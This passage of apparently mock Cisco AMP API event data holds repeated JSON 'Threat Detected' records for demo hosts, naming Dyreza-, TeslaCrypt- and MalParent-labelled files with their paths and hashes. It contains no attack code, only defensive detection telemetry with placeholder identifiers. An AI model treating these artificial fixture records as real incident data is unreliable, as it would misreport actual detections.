b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
